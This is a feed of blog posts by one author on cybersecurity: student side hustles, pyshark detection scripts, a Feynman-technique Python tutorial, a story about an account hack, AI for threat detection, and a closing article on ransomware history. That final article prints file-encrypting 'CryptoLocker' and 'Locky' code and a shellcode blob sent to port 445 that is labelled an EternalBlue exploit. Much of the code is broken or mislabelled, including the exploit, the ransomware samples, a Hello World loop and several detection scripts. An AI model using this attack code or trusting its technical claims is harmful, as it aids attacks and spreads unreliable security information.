DEV Community: William Baptist

5 Fun Side Hustles for Cybersecurity Students

William Baptist — Sun, 04 Jun 2023 20:28:35 +0000

So many online resources seem to be vastly outdated when it comes to side hustles, especially for students. I want to show practical ways that I’ve personally used in the past few months that worked for me and will work for you. What’s great is that all of these can be a learning experience alongside being a fun way to make money.

1. Building and Selling Cybersecurity Tools

Income: $100–$500 per month

I’ve been developing and selling my own cybersecurity tools extensively. You’ll be surprised how many businesses are willing to pay for customised solutions to meet their specific problems.

Identify a need within the market and develop a tool to meet it. This requires strong programming skills and a good understanding of cybersecurity. Once you’ve developed your tool, you can sell it on platforms like GitHub Marketplace, or directly to businesses.

2. Web Hosting Security Consultant

Income: $100–$1000+ per month

Now for this method I’m going to use Fiverr as an example because that was the site I used but you can use any other number of online freelance websites or even try hosting your own site!

The key to this is to offer your services to a niche area of web hosting. For example, I offered setup services in SSL certificates for websites. I also would offer hosting as an option that was bundled with the SSL certificates.

There are two platforms that helped me achieve this named SSLs.com and Skystra with the former being the main source of income. I gained the skills in my first year of college for choosing the correct SSL certificate and setting this up for the client (naturally charging extra for the setup fee)

Skystra allowed me to scale what I needed by charging monthly so I would recommend looking into the best options for your hustle.

3. Security eCommerce

Income: $100–$10,000+ per month

Let’s be honest, traditional dropshopping sucks in 2023 but it doesn’t mean you can’t take advantage of that concept.

You can try your hand at creating a custom platform or a mobile app that caters to a niche market and integrate it with Easyship for seamless fulfillment. For example, you could make an e-commerce platform for physical security goods that are tailored to computers (Encrypted USBs, Webcam covers etc.)

4. Online Cybersecurity Tutoring

Income: $200 — $1000+ per month

As you know there is a high demand for cybersecurity knowledge and many people are looking for tutors to help them grasp complex cybersecurity concepts.

Join online tutoring platforms like Chegg and Tutor.com. To be an effective tutor, it’s best if you already have a good grasp of cybersecurity principles, patience, and excellent communication skills.

5. Writing Cybersecurity Articles

Income: $0–$200 per month

Finally, this is one I do a lot and the key to it is fun!

It’s less of a sidehustle but to me there is nothing better than sharing cool tools within articles about cybersecurity. It also looks really good on your resume if you are actively engaging and contributing to the cybersecurity community.

Get noticed, get inspired and check out my profile and see if you can spot some more articles you might like!

Advanced Wireshark Scripts for Intrusion Detection

William Baptist — Sun, 14 May 2023 19:14:38 +0000

In this article, I have delved into the depths of Wireshark scripting once again and discovered some unconventional techniques to unravel hidden threats and identify suspicious activities.

Revealing Covert Channels:

Covert channels are stealthy communication paths that bypass traditional security measures. To expose these hidden channels, you can leverage Wireshark scripting and Python’s flexibility.

The following script detects hidden communication within seemingly harmless network traffic:

import pyshark

#Open the captured packets file
cap = pyshark.FileCapture("packets.pcapng")

#Detect suspicious covert channels
for pkt in cap:
    if "HTTP" in pkt:
        payload = pkt.http.payload
        if payload and payload.startswith("CovertChannel"):
            print(f"Covert Channel Detected: {payload}")

By analysing the payload of HTTP packets, it can identify covert channels that employ specific keywords or patterns. This shines a light on covert communication, allowing you to take appropriate countermeasures.

Uncovering DNS Tunneling:

DNS tunneling is a technique used to bypass network security by encapsulating data within DNS requests and responses. Let’s shed light on these covert channels.

The following script identifies potential DNS tunnels:

import pyshark
import dnslib

#Open the captured packets file
cap = pyshark.FileCapture("packets.pcapng")

#Detect potential DNS tunnels
for pkt in cap:
    if "DNS" in pkt:
        dns_packet = dnslib.DNSRecord.parse(pkt.dns.raw)
        for question in dns_packet.questions:
            if "tunnel" in str(question.qname):
                print("Potential DNS Tunnel Detected!")

By parsing DNS packets and inspecting the requested domain names (questions), you can pinpoint suspicious queries that may indicate the presence of a DNS tunnel. This script acts as a valuable early warning system against covert data exfiltration.

Utilising Statistical Anomaly Detection:

Intrusion detection can be enhanced by leveraging statistical anomaly detection techniques. Wireshark scripting, combined with Python’s statistical libraries, can help us identify deviations from normal network behavior.

Consider the following script that applies anomaly detection to packet sizes:

import pyshark
import numpy as np
from scipy.stats import zscore

#Open the captured packets file
cap = pyshark.FileCapture("packets.pcapng")

#Extract packet sizes
packet_sizes = [int(pkt.length) for pkt in cap]

#Detect anomalous packet sizes
z_scores = zscore(packet_sizes)
anomalies = np.where(z_scores > 3)[0]

if len(anomalies) > 0:
    print("Anomalous Packet Sizes Detected!")

By calculating z-scores for packet sizes and comparing them to a threshold, it can identify packets that deviate significantly from the expected range. This script allows you to spot abnormal packet size patterns, potentially indicating network anomalies or malicious activities.

Port Scan Detector:

A port scanner detector is essential for network security as it helps identify unauthorised scanning activities. By detecting port scans, it enables administrators to pinpoint potential vulnerabilities in their systems and take appropriate measures to mitigate risks.

This proactive script aims to cover these bases:

import pyshark

#Open the captured packets file
cap = pyshark.FileCapture("packets.pcapng")

#Track port scanning activities
scan_counter = {}

#Detect port scans
for pkt in cap:
    if "TCP" in pkt:
        src_ip = pkt.ip.src
        dst_ip = pkt.ip.dst
        src_port = pkt.tcp.srcport
        dst_port = pkt.tcp.dstport
        activity = f"{src_ip}:{src_port} --> {dst_ip}:{dst_port}"

        if activity in scan_counter:
            scan_counter[activity] += 1
        else:
            scan_counter[activity] = 1

#Identify potential port scanning activities
for activity, count in scan_counter.items():
    if count > 5:  #Adjust the threshold as per your needs
        print(f"Possible Port Scanning Detected: {activity} ({count} attempts)")

The script examines each packet to determine if it is associated with the TCP protocol. For every communication flow between two endpoints, a distinct identifier is generated. As the script encounters packets, it updates the counter accordingly. If the count surpasses a predefined threshold, an alert is triggered, indicating a port scan taking place.

Exposing DNS Cache Poisoning Attacks:

Network’s DNS Infrastructure is obviously crucial, these attacks can lead to incorrect DNS responses. They can also lead to redirecting users to malicious websites, intercepting their communications or compromising their data.

By effectively detecting and preventing this with this script below it ensures the reliability and trustworthiness of our system:

import pyshark
import dnslib

#Open the captured packets file
cap = pyshark.FileCapture("packets.pcapng")

#Track DNS cache poisoning attempts
poisoning_attempts = []

#Detect DNS cache poisoning attacks
for pkt in cap:
    if "DNS" in pkt:
        dns_packet = dnslib.DNSRecord.parse(pkt.dns.raw)
        for question in dns_packet.questions:
            if question.qtype == dnslib.QTYPE.ANY:
                qname = str(question.qname)
                if qname not in poisoning_attempts:
                    poisoning_attempts.append(qname)

#Display the identified DNS cache poisoning attempts
if poisoning_attempts:
    print("Detected DNS Cache Poisoning Attempts:")
    for attempt in poisoning_attempts:
        print(attempt)
else:
    print("No DNS Cache Poisoning Attempts Detected.")

By parsing the captured packets, the script identifies DNS packets and examines the questions section for requests of any type. If a request for an ANY type is found, the script extracts the domain name and checks if it is already in the list of detected poisoning attempts. If not, it adds the domain name to the list.

Finally, the script displays the identified DNS cache poisoning attempts, or a message indicating that no attempts were detected leaving the following result:

Detecting hidden communication within seemingly harmless network traffic allows us to expose vulnerabilities that otherwise could go unnoticed. I hope that you found some use from these scripts and remember that you will be required to extensively change them to get some use from your own network!

Simple Wireshark Scripts for Easy Network Forensics

William Baptist — Thu, 11 May 2023 19:20:08 +0000

In this article, I’ll show you some practical Python code snippets to simplify network forensics.

Capturing Packets:

With the help of the pyshark library, the script can swiftly grab packets based on filters and save them for further analysis.

To install pyshark, type in the terminal:

pip install pyshark

Then take a look at this code snippet:

import pyshark

#Define capture interface and filter fields
capture = pyshark.LiveCapture(interface='eth0', display_filter='tcp')

#Start capturing packets
capture.sniff(timeout=10)

#Save captured packets to a file
capture.export_packet_stream("packets.pcap")

Analysing Packets:

Now that the packets are captured, let’s analyse them with the next script. Pyshark provides a straightforward way to extract valuable information from captured packets.

Check out this example that extracts the source and destination IP addresses of TCP packets:

import pyshark

#Open the packets file
cap = pyshark.FileCapture("packets.pcap")

#Extract source and destination IP addresses of TCP packets
for pkt in cap:
    if "TCP" in pkt:
        print(f"Source IP: {pkt.ip.src}, Destination IP: {pkt.ip.dst}")

Filtering Packets:

Filtering out noise from captured packets will makes lives much easier. Pyshark allows us to apply display filters to narrow down the packets we analyse.

Let’s see how to filter and count HTTP packets:

import pyshark

#Open the captured packets file
cap = pyshark.FileCapture("packets.pcap")

#Apply a display filter to focus on HTTP packets
cap.set_display_filter('http')

#Count the number of HTTP packets
http_count = 0
for pkt in cap:
    http_count += 1

print(f"Total HTTP packets: {http_count}")

Filtering Packets with a Twist:

Let’s take packet filtering to the next level. Pyshark is not only used for simple filtering but also offers a range of powerful filtering options that can make the analysis even more precise.

Look at this more advanced filtering script using Pyshark:

import pyshark

#Open the captured packets file
cap = pyshark.FileCapture("packets.pcap")

#Apply a complex display filter to focus on specific traffic
cap.set_display_filter('tcp.port == 80 && ip.dst == 192.168.0.1')

#Count the number of filtered packets
filtered_count = 0
for pkt in cap:
    filtered_count += 1

print(f"Total filtered packets: {filtered_count}")

In this example, there is a display filter that targets TCP packets with a destination IP of 192.168.0.1 and a port of 80. Feel free to unleash your creativity and customise the filters based on your specific investigation needs.

Adding a Dash of Visualisation:

Now, let’s bring the network forensics findings to life with some eye-catching visualisations. The Matplotlib library is handy, allowing the creation of captivating charts and graphs.

Install Matplotlib library in terminal with the following:

pip install matplotlib

Then the scapy library:

pip install scapy

Here’s the script that visualises the distribution of IP types for each packet:

from scapy.all import *
import matplotlib.pyplot as plt

#Read the pcap file
packets = rdpcap("packets.pcap")

#Dictionary to store protocol counts
protocol_counts = {}

#Iterate over the captured packets
for pkt in packets:
    if IP in pkt:
        protocol = pkt[IP].proto
        protocol_counts[protocol] = protocol_counts.get(protocol, 0) + 1

#Prepare data for the diagram
protocols = list(protocol_counts.keys())
count_values = list(protocol_counts.values())

#Plotting the diagram
plt.bar(protocols, count_values)
plt.xlabel('Protocol')
plt.ylabel('Count')
plt.title('Protocol Distribution')
plt.show()

The script reads the pcap file that was created from Wireshark and iterates over the captured packets, counting the occurrences of different IP protocols. The diagram created provides insights into the protocol distribution, helping to understand the composition of the network traffic captured in the pcap file.

You’ll be able to witness the the occurrences of different IP protocols, all in a beautifully rendered chart:

From crafting precise display filters to visualising packet characteristics, Python and Wireshark scripting empowers us to navigate the intricate digital realm with clarity.

Capture, analyse, filter, and visualise your way to the heart of your network’s darkest mysteries. Happy scripting and may your investigations be as smooth as my packet capture visualisation.

Hello World meets the Feynman Technique

William Baptist — Wed, 10 May 2023 21:58:03 +0000

Imagine taking a simple one-liner in Python and turning it into a more complex program that you have to explain to a toddler. Sound like a challenge? Well, it certainly was for me.

To guide me through the process, I decided to use the powerful and effective Feynman Technique, which follows the following four steps:

Step 1: Choose a Concept

The first step of the Feynman Technique is to choose a concept that you want to understand. In my case, I wanted to understand the basics of Python programming and how to create a “Hello World” program that was more complex than the usual one-liner.

I went back to basics with Python and experimented with the different code snippets below:

# How must people would (and should) print Hello, World!
print("Hello, World!")

# Using variables in a Hello, World!
message = "Hello, World!"
print(message)

# Adding user input to a "Hello World" program
name = input("What is your name? ")
print("Hello " + name)

# Adding a loop to the Hello, World! program
for i in range(5):
    print("Hello, World!)

Step 2: Teach it to a Toddler

The second step of the Feynman Technique, of course, is to teach the concept to a toddler. If I can explain it in simple terms that a child can understand, then it helps two people. So, luckily for me (and him), it was my grandfather’s birthday recently, so I decided to explain the basics of Python programming to my little cousin, who is six years old. I started by showing him some simple Python code and explaining what each line did.

I used analogies and examples to help him understand, and I tried to make it fun by turning it into a game. I explained conditional statements by comparing them with a traffic light. When the light is green, you can go, but when it is red, you have to stop. Similarly, in a program, if a certain condition is met, you can execute a set of instructions, but if it is not met, you can execute a different set of instructions. By the end of our lesson, he was able to create his own “Hello World” program and, to my surprise, was excited to learn more.

Step 3: Identify Gaps and Fill Them

The third step of the Feynman Technique is to identify any gaps in your understanding and fill them in. After teaching my little cousin about Python, I realised that there were still some areas that were hard to teach to people who weren’t already proficient in coding. My cousin had trouble understanding why we needed to use variables and how they were different from one another. To overcome this challenge, I used another simple analogy to explain the concept. I told him that variables were like containers that we use to store different types of things, such as toys or clothes. Just like we use different containers for different things, we use different variables to store different types of data, such as numbers or words.

I found that explaining the concept of object-oriented programming to someone without any prior knowledge of coding can be a bit challenging. However, through further research and practice, I was able to strengthen my understanding and break down the topic in a more approachable way. By the end of this step, I felt confident in my ability to explain the more complex “Hello, World!” program.

Step 4: Simplify and Use Analogies

The fourth and final step of the Feynman Technique is to simplify the concept and use analogies to help explain it.

Here’s what my “complex” Hello World program looks like:

import random

def get_greeting():
    greetings = ["Hello", "Hi", "Hey", "Greetings"]
    return random.choice(greetings)

def get_name():
    name = input("What's your name? ")
    return name

def greet():
    greeting = get_greeting()
    name = get_name()
    print(f"{greeting} {name}, welcome to my program!")

if __name__ == "__main__":
    greet()

Let’s say my grandpa’s birthday had a surprise party. We want to greet him with a random greeting from a list of possible greetings and also ask him for his name so we can address him properly.

import random

We need to import the random module from Python to randomly choose a greeting from the list of greetings that we have prepared.

def get_greeting():
    greetings = ["Hello", "Hi", "Hey", "Greetings"]
    return random.choice(greetings)

We need to define a function called get_greeting() that will randomly choose a greeting from a list of possible greetings. In the party analogy, this is like having a box of greeting cards with different messages. Someone will randomly pick one card and read the message to our grandad.

def get_name():
    name = input("What's your name? ")
    return name

We also need to define a function called get_name() that will ask my grandpa for his name. In our party analogy, this is like having a guestbook where I ask my grandpa to write down his name. The input() function in Python will allow me to get his name as input from the keyboard.

def greet():
    greeting = get_greeting()
    name = get_name()
    print(f"{greeting} {name}, welcome to my program!")

Finally, we define the main function greet() that will put everything together. In our party analogy, this is like having a host who will read the greeting card to my grandad and address him properly by his name. The print() function in Python will allow the display of a greeting and the grandad's name on the screen.

if __name__ == "__main__":
    greet()

This line of code is a bit technical, but it’s important to include. It basically checks if the code is being run as the main program or if it is being imported as a module. In this party analogy, this is like having my mother at the entrance of the party who will only allow guests who were invited by us to enter. If the code is run as the main program (which is what we want), then it will call the greet() function and start the party by displaying the greeting to my grandad.

Through the four steps of choosing a concept, teaching it to a toddler, identifying gaps, and simplifying with analogies, I was able to turn a simple “Hello World” program into a more complex program. The Feynman Technique can be used in any subject, and I would highly recommend it to anyone looking to improve their understanding of a topic.

I Was Hacked: What I’ve Learned Since

William Baptist — Wed, 10 May 2023 10:01:53 +0000

It was Easter 2018. I was still in high school, and like many teenagers, I was a bit reckless. I signed up for a website that promised safety, unaware of its history of data breaches. Little did I know that my personal information, along with that of thousands of other users, was at risk from the moment I signed up. What followed was a startling truth about cybersecurity that many people still find hard to admit.

Fast forward to 2021, and I’m a college student who has developed a deep interest in cybersecurity. I devoured countless articles that preached about the gospel of three-factor authentication, but let’s be real: theory is nothing without practical application. Little did I know, a real-world problem was lurking around the corner, ready to test my knowledge and skills.

It all began with a notification on my phone from an old Amazon account. The message informed me that my account had been used to purchase a high-end camera and lens worth several thousand pounds. The destination? Grimsby, of all places.

To my surprise, I was able to log in even though it was quite clear that it had been compromised. As I delved deeper later, I discovered that there was a way to bypass the two-factor authentication system. All that was needed was an Amazon email and password, which allowed the perpetrator to order items without any hassle.

The irony of the situation hit me hard. I thought I had taken all the necessary precautions and followed the cybersecurity protocols I had learned in college. But as it turns out, all it takes is one small mistake to compromise your entire digital defensive framework.

As I reflect on this experience, I can’t help but acknowledge the emotional impact it had on me. Back in high school, I was careless, and there was far less at stake. But when I learned that my data had been breached, I felt violated and exposed. It was a wake-up call that made me realise the importance of proactive cybersecurity and motivated me to take action.

I refused to be a victim again, so after (eventually) getting a refund from Amazon and resetting everything, I devised a plan:

Actively monitoring accounts

If I had known that the accounts that had access to my financial information were breached, then this entire incident could have been avoided. I started regularly checking my accounts for suspicious activity or logins from unknown devices. I checked sites like haveibeenpwned.com regularly for every email I use. I then set up alerts and notifications to keep me informed about any unauthorised access to my accounts. If any suspicious activity was detected, I could act quickly and change passwords, revoke access, or contact support. I also recognised the benefit of using active monitoring software such as SentryPC that does a lot of the steps for you without so much effort.

Account diversification

Diversifying your accounts isn’t just a practice reserved for stock portfolios. After experiencing a cybersecurity nightmare, I realised the importance of diversifying my email accounts. Rather than relying on a single account for all my financial information, I decided to create multiple accounts for different purposes. This way, if one account were to be compromised, the others would remain secure. There are different approaches to diversifying accounts, including using different usernames, passwords, and emails for each account, depending on how much security you desire.

Two-step verification for every account

Relying solely on different passwords clearly wasn’t enough, even if I used a diversification system for my accounts. I decided to implement a two-step verification process for all my accounts. I chose a mobile app-based verification process that required a one-time password (OTP).

Here’s an example of how to enable two-step authentication for your Google account:

Go to your Google Account settings.
Go to the Security tab.
Click on the 2-Step Verification section.
Provide your phone number so you can receive a verification code via text message or set up an authentication app, such as Google Authenticator or Authy.
Once two-step verification is set up you will be prompted to enter a verification code after entering your password. This code will be sent to your phone or generated by your authentication app depending on the app you chose.

Honeypotting

Finally, I decided to somewhat controversially set up fake accounts with enticing information to draw hackers away from my actual data.
This technique of setting up fake accounts to attract hackers is called honeypotting and is commonly used as a cybersecurity strategy to deceive attackers and protect sensitive data. I created multiple fake accounts on different platforms, using fake names and personal information that hackers would find attractive. This way, hackers would be drawn to these fake accounts instead of my real ones, providing an additional layer of protection.

For your honeypot accounts, I would recommend a variety of different types of enticing information, including:

Creating a fake email account with the subject line “passwords” or “account information”.
Creating a fake social media account which appeared to leak personal information (that is all fabricated).
Changing an old account you’ve had on a secure website for a while to also appear to leak personal information.

I have found that intentionally wasting the time of someone who is attempting to steal your personal information can significantly enhance your online security. While I do acknowledge that making honey pots can be time-consuming and demands continuous attention to upkeep, I personally find it rewarding to study the techniques attackers use.

Through this experience, I came to understand that cybersecurity is not just a buzzword; it’s a critical aspect of our digital lives that cannot be taken lightly. It’s easy to be passive when you see yourself as a defender, but most of the time the best form of defence is attack, and the real challenge lies in implementing this mindset in our daily lives. And for me, that meant learning from my mistakes and taking the necessary steps to secure my online presence, which is what my plan hopefully shows you.

AI Helps Make Cybersecurity Simple in 2023

William Baptist — Tue, 09 May 2023 23:44:15 +0000

When it comes to AI and cybersecurity in 2023, I’ve got to say, count me in! I’m not just cautiously optimistic; I’m downright enthusiastic. In fact, I think AI might just be the hero that cybersecurity needs right now.

As cyber threats become more sophisticated, traditional security measures like firewalls and antivirus software are unfortunately no longer sufficient. To keep up with evolving threats, I, among others in this field, have increasingly started turning to artificial intelligence (AI) to help defend against attacks. In this article, I explore the specific tools and techniques available for cybersecurity professionals to harness AI effectively.

Please note that throughout this article I use the British spelling of words other than the code, which had to be written using American English.

Machine Learning for Threat Detection

One of the most promising applications of AI in cybersecurity is in threat detection. By training machine learning models on large datasets of past attacks, these models can learn to identify new threats and respond more quickly and effectively than traditional signature-based approaches.

For example, look at the below Python code, which uses the scikit-learn library to train a machine learning model on a dataset of known malware samples:

from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
import pandas as pd

# Load the malware dataset
malware_data = pd.read_csv('malware.csv')

# Split the dataset into training and testing sets
X_train, X_test, y_train, y_test = train_test_split(
    malware_data.drop('class', axis=1),
    malware_data['class'],
    test_size=0.2,
    random_state=42
)

# Train a random forest classifier on the training data
clf = RandomForestClassifier()
clf.fit(X_train, y_train)

# Evaluate the performance of the classifier on the testing data
score = clf.score(X_test, y_test)
print(f"Classifier accuracy: {score}")

This loads a dataset of known malware samples, splits the data into training and testing sets, and trains a random forest classifier on the training data. Then it evaluates the performance of the classifier on the testing data, using the score() method to calculate the accuracy of the model.

Obviously, the process of training a machine learning model for threat detection is much more complex than this simple example. The basic idea is still the same, though: by leveraging machine learning algorithms, it is possible to detect new threats more effectively than traditional approaches.

Natural Language Processing for Fraud Detection

Another area where AI can be used to combat digital threats is fraud detection. Natural language processing (NLP) techniques can be used to analyse large volumes of text data, such as emails and social media messages, to identify signs of fraudulent activity.

This script uses the Natural Language Toolkit (NLTK) library to analyze a sample of emails and identify potential signs of fraud:

import nltk
import pandas as pd

# Load the email data
email_data = pd.read_csv('emails.csv')

# Tokenize the text of each email
tokenized_emails = [nltk.word_tokenize(email) for email in email_data['text']]

# Identify named entities in the text of each email
named_entities = [nltk.ne_chunk(nltk.pos_tag(email)) for email in tokenized_emails]

# Extract the organisation entities from the named entities
organizations = [[entity for entity in email if isinstance(entity, nltk.tree.Tree) and entity.label() == 'ORG'] for email in named_entities]

# Count the frequency of each organisation entity
org_counts = pd.Series([org[0][0] for email in organizations for org in email]).value_counts()

# Print the top 10 most common organisation entities
print(org_counts[:10])

The script loads email data from a CSV file, tokenizes the text of each email, identifies named entities in the text using part-of-speech tagging, extracts organisation entities from the named entities, and then counts the frequency of each organisation entity. Finally, it prints the top 10 most common organisation entities in the email data. This could be useful for tasks such as identifying potential phishing targets or detecting mentions of specific companies in a large email dataset.

Anomaly Detection Algorithms

The Isolation Forest Algorithm can be effectively used when looking for anomalies in large pieces of data. I will walk you through implementing this more sophisticated algorithm for anomaly detection that can cope with high-dimensional datasets.

First, import the necessary libraries:

import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import IsolationForest

Next, load the data from the log file:

with open('system_log.txt') as f:
    data = []
    for line in f:
        # Parse the log line and extract the relevant features
        feature_1, feature_2, feature_3 = parse_log_line(line)
        data.append([feature_1, feature_2, feature_3])

Then normalise the data using standard scaling:

data = np.array(data)
scaler = StandardScaler()
data = scaler.fit_transform(data)

Now the fun AI-ey part of training the Isolation Forest model on the normalised data and using the model to predict the anomalies:

model = IsolationForest(random_state=0)
model.fit(data)
anomaly_scores = model.decision_function(data)
threshold = -0.5

and the result should be printed as so:

for i, score in enumerate(anomaly_scores):
    if score < threshold:
        label = 'anomaly'
    else:
        label = 'normal'
    print(f"Data point {i} has an anomaly score of {score:.3f} and is classified as {label}.")

The Isolation Forest algorithm is so popular because it’s an unsupervised machine learning algorithm that works by isolating anomalies in the data set by randomly partitioning the data points and building isolation trees.

This code, along with most of the code from my articles, can be easily adapted to work with different log files and clustering algorithms.

AI Network Defence Systems

Your network can be defended by a deep learning system; in fact, most companies are using AI right now to protect their networks (including Medium!)

Here is an example of a recent AI-powered network defence system using deep learning models:

import numpy as np
import tensorflow as tf

# Load the network traffic data
data = np.loadtxt('traffic.csv', delimiter=',')

# Preprocess the data
x = data[:, :-1]
y = data[:, -1]
num_classes = len(np.unique(y))
y = tf.keras.utils.to_categorical(y, num_classes=num_classes)

# Define the deep learning model
model = tf.keras.Sequential([
    tf.keras.layers.Dense(32, activation='relu', input_shape=(x.shape[1],)),
    tf.keras.layers.Dense(64, activation='relu'),
    tf.keras.layers.Dropout(0.5),
    tf.keras.layers.Dense(num_classes, activation='softmax')
])

# Compile the model
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

# Train the model
model.fit(x, y, epochs=10, batch_size=32)

# Use the model for network defence
def defend_network(new_data):
    # Preprocess the new data
    x_new = np.array(new_data)
    x_new = np.expand_dims(x_new, axis=0)

    # Predict the class of the new data
    prediction = model.predict(x_new)
    return np.argmax(prediction)

# Test the network defence system
test_data = [20, 300, 1000, 50, 200, 400, 800]
print(defend_network(test_data))

The traffic.csv file contains preprocessed network traffic data, where the last column contains the class label. The data is split into input features (x) and class labels (y), which are one-hot encoded.

The deep learning model is defined using the tf.keras.Sequential API, with dense layers and a softmax output layer. The model is compiled using the adam optimizer and categorical cross-entropy loss. The model is trained using the fit method with a batch size of 32 and 10 epochs. The defend_network function is defined to preprocess new data, predict the class of the new data using the trained model, and return the predicted class label. A test data array is defined, and the defend_network function is called to predict the class label of the test data.

I’ve showcased that AI is a powerful tool that can greatly enhance cybersecurity defences by enabling faster and more accurate threat detection and response. From anomaly detection algorithms to natural language processing for fraud detection, AI is making a significant impact in the fight against digital threats rather than just contributing to more problems for blue teamers. It’s important to continue developing and implementing new AI-based technologies to stay ahead of the ever-evolving threat landscape.

The Impressive Evolution of Ransomware Code

William Baptist — Tue, 09 May 2023 23:41:53 +0000

Following the history of Ransomware is like watching a horror movie where the villain keeps getting smarter and more sophisticated. There’s something fascinating and yet daunting about the evolution of ransomware. In this article, I’ll take you on a deep dive into the historic timeline and show you what makes these malicious programs so difficult to stop.

The first known ransomware, known as the AIDS Trojan, appeared in 1989. Since then, ransomware has evolved significantly, becoming one of the most prevalent and destructive types of malware. This article will follow the evolution of ransomware, from the early days of CryptoLocker to the infamous WannaCry and more recent Maze and REvil ransomware attacks, while explaining how each type of ransomware works with actual code samples.

2013: CryptoLocker

CryptoLocker was the first ransomware to use public key cryptography to encrypt files. It was distributed via email attachments and exploited vulnerabilities in Java and Adobe Reader to infect systems. Once it infected a system, it encrypted all the files on the system and demanded payment in Bitcoin to provide the decryption key.

Code Sample:

import os
import random
import string
from Crypto.Cipher import AES

class CryptoLocker:
    def __init__(self, key):
        self.key = key

    def encrypt_file(self, in_filename, out_filename=None, chunk_size=64 * 1024):
        if not out_filename:
            out_filename = in_filename + '.enc'

        iv = ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(16)])
        encryptor = AES.new(self.key, AES.MODE_CBC, iv)

        filesize = os.path.getsize(in_filename)

        with open(in_filename, 'rb') as infile:
            with open(out_filename, 'wb') as outfile:
                outfile.write(struct.pack('<Q', filesize))
                outfile.write(iv)

                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    elif len(chunk) % 16 != 0:
                        chunk += b' ' * (16 - len(chunk) % 16)

                    outfile.write(encryptor.encrypt(chunk))

    def decrypt_file(self, in_filename, out_filename=None, chunk_size=24 * 1024):
        if not out_filename:
            out_filename = os.path.splitext(in_filename)[0]

        with open(in_filename, 'rb') as infile:
            orig_size = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
            iv = infile.read(16)
            decryptor = AES.new(self.key, AES.MODE_CBC, iv)

            with open(out_filename, 'wb') as outfile:
                while True:
                    chunk = infile.read(chunk_size)
                    if len(chunk) == 0:
                        break
                    outfile.write(decryptor.decrypt(chunk))

                outfile.truncate(orig_size)

# Usage example
key = b'secret_key_1234'
c = CryptoLocker(key)
c.encrypt_file('test_file.txt')
c.decrypt_file('test_file.txt.enc')

The python code implements a class that can encrypt and decrypt files using the AES encryption algorithm. The class constructor takes an encryption key as an argument, which is used to encrypt and decrypt the files. The encrypt_file method takes an input file name and an optional output file name and chunk size. It reads the input file, pads it to a multiple of 16 bytes, and encrypts it using AES in CBC mode with a randomly generated initialization vector (IV). It writes the encrypted data to the output file, along with the original file size and the IV.

The decrypt_file method takes an input file name and an optional output file name and chunk size. It reads the input file, extracts the original file size and the IV, and decrypts the encrypted data using the same encryption key and IV. It writes the decrypted data to the output file and truncates it to the original file size. An example usage of the class is provided at the end of the code, where a CryptoLocker object is created with a secret key, an input file is encrypted, and then decrypted.

2016: Locky

Locky was distributed via email campaigns and used a combination of RSA and AES encryption to encrypt files. It demanded payment in Bitcoin to provide the decryption key. It was estimated to have infected over 100,000 systems within its first few weeks of release.

Code Sample:

import os
import base64
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA

# Generate RSA key pair
key = RSA.generate(2048)

# Encrypt file using AES-128
key_aes = os.urandom(16)
cipher_aes = AES.new(key_aes, AES.MODE_EAX)
ciphertext, tag = cipher_aes.encrypt_and_digest(b'encrypted data')

# Encrypt AES key using RSA public key
cipher_rsa = key.public_key().encrypt(key_aes, None)

# Save encrypted file and AES key to disk
with open('encrypted_file.bin', 'wb') as f:
    f.write(ciphertext)

with open('encrypted_key.bin', 'wb') as f:
    f.write(cipher_rsa)

This python code generates an RSA key pair, then uses the AES encryption algorithm in EAX mode to encrypt some data, with a randomly generated AES key. The AES key is then encrypted using the RSA public key, and both the encrypted file and encrypted key are saved to disk.

2017: WannaCry

In 2017, the WannaCry ransomware spread rapidly across the globe, infecting hundreds of thousands of computers in over 150 countries. WannaCry exploited a vulnerability in the Windows operating system called EternalBlue, which was allegedly developed by the NSA

The widespread nature of the attack and the critical systems affected underscored the need for organizations to prioritize cybersecurity and maintain up-to-date software and security protocols to prevent such attacks..

Code Sample:

import socket

# EternalBlue exploit code
exploit = (
    b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x10\x5b\x53\x4b\x8b\x58\x18"
    b"\x8b\x53\x20\x01\xda\x51\x52\x8b\x52\x3c\x01\xda\x8b\x72\x78\x01"
    b"\xde\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
    b"\xc7\x49\x75\xef\x52\x57\x8b\x52\x20\x01\xda\x53\x8b\x34\x9a\x01"
    b"\xde\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03"
    b"\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xda\x66\x8b\x0c"
    b"\x4b\x8b\x58\x1c\x01\xda\x8b\x04\x8b\x01\xda\x89\x44\x24\x24\x5b"
    b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff"
    b"\xff\x5d\x6a\x01\x8d\x45\x68\x50\x68\x8e\x4e\x0e\xec\xff\xd5\x97"
    b"\x68\x8f\x0e\x4e\xec\x89\xe3\x6a\x10\x53\x57\x68\xde\xf8\x24\x75"
    b"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x8b\x36\x8b\x55\xfc"
    b"\x8b\x46\x0c\x8b\x7e\x1c\x8b\x4e\x08\x8b\x7e\x20\x8b\x36\x66\x39"
    b"\x4f\x18\x75\xf2\x66\x81\x39\x44\x44\x75\xe6\x5e\x56\x53\x2c\x24"
    b"\x0f\xba\x2c\x17\x42\x52\x6a\x01\x52\xff\xd0\x68\x63\x6d\x64\x00"
    b"\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\xff\xd5\x97\x6a\x0a\x5f"
    b"\xc3"
)

# IP address and port of vulnerable machine
target_ip = "192.168.1.100"
target_port = 445

# Create a TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))

# Send exploit code
sock.send(exploit)

# Close the socket
sock.close()

This snippet creates a TCP socket and connects to the target machine’s IP address and port. It then sends the WannaCry exploit code to the target machine over the socket connection.

